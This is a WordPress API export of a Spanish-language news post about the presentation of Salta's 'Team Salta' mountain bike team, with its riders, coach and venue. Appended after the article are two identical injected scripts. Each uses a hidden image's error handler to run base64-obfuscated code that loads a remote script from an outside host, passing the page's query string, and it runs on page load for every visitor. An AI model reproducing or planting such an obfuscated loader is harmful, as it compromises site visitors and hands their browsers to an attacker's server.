{"id":2876,"date":"2023-07-19T10:00:02","date_gmt":"2023-07-19T13:00:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2876"},"modified":"2025-08-14T00:12:24","modified_gmt":"2025-08-14T03:12:24","slug":"presentaran-hoy-el-team-salta-de-mountain-bike","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2876","title":{"rendered":"Presentar\u00e1n hoy El \u201cTeam Salta\u201d de mountain bike"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a90453\"><em>El equipo est\u00e1 conformado por ciclistas de todas las categor\u00edas y representar\u00e1 a la provincia en las diferentes competencias. La presentaci\u00f3n ser\u00e1 hoy a las 10 en la Secretar\u00eda de Deportes.<\/em><\/h4>\n\n\n\n<p>La Fundaci\u00f3n Sendass presentar\u00e1 el \u201c<strong>Team Salta<\/strong>\u201d de MTB, que representar\u00e1 a la provincia en las competencias regionales, nacionales e internacionales del calendario FACIMO-UCI. Estar\u00e1 conformado por ciclistas de diferentes categor\u00edas, desde infantiles hasta mayores.<\/p>\n\n\n\n<p>El objetivo principal de este equipo ser\u00e1 el de afianzar la promoci\u00f3n del mountain bike y motivar a quienes ya practican la disciplina. De esta manera podr\u00e1n mejorar su rendimiento deportivo, lo que permitir\u00e1 que los bikers puedan ascender en los rankings nacional e internacional. Tambi\u00e9n se har\u00e1 \u00e9nfasis en fortalecer el buen comportamiento, el compa\u00f1erismo y consolidar los valores del deporte. &nbsp;<\/p>\n\n\n\n<p>La presentaci\u00f3n oficial del Team Salta de MTB ser\u00e1 este mi\u00e9rcoles 19 de julio, a las 10, en la&nbsp;<strong>Secretaria de Deportes<\/strong>, Entre R\u00edos 1550.<\/p>\n\n\n\n<p><strong>Un equipo competitivo<\/strong><\/p>\n\n\n\n<p>El Team Salta estar\u00e1 conformado por los ciclistas Ricardo Colque (Categor\u00eda Elite), Juan Aguirre (Juveniles), Leonel Carral (Juveniles), Manuel Blosser (Cadetes); Alejo Ortiz (Cadetes), Nicol\u00e1s Larr\u00e1n (Cadetes), Franco Su\u00e1rez (Menores), Carlos Ramos (Menores). En tanto, la categor\u00eda Infantiles (05 a 12 a\u00f1os) est\u00e1 integrada por Hugo Maita, Francisco Ramos, Micaela Zuleta y Leo Morales.<\/p>\n\n\n\n<p>El Entrenador del equipo ser\u00e1 Pablo Grifasi, acompa\u00f1ado por Lucas Morales, como Director Deportivo. El Director General del proyecto es C\u00e9sar Choque, presidente de la Fundaci\u00f3n Sendass.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/presentaran-hoy-el-team-salta-de-mountain-bike-90768\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El equipo est\u00e1 conformado por ciclistas de todas las categor\u00edas y representar\u00e1 a la provincia en las diferentes competencias. La presentaci\u00f3n ser\u00e1 hoy a las 10 en la Secretar\u00eda de Deportes. La Fundaci\u00f3n Sendass presentar\u00e1 el \u201cTeam Salta\u201d de MTB, que representar\u00e1 a la provincia en las competencias regionales, nacionales e internacionales del calendario FACIMO-UCI. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2877,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,18],"tags":[],"class_list":{"0":"post-2876","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2876"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2876"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2876\/revisions"}],"predecessor-version":[{"id":7020,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2876\/revisions\/7020"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2877"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2876"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2876"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2876"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}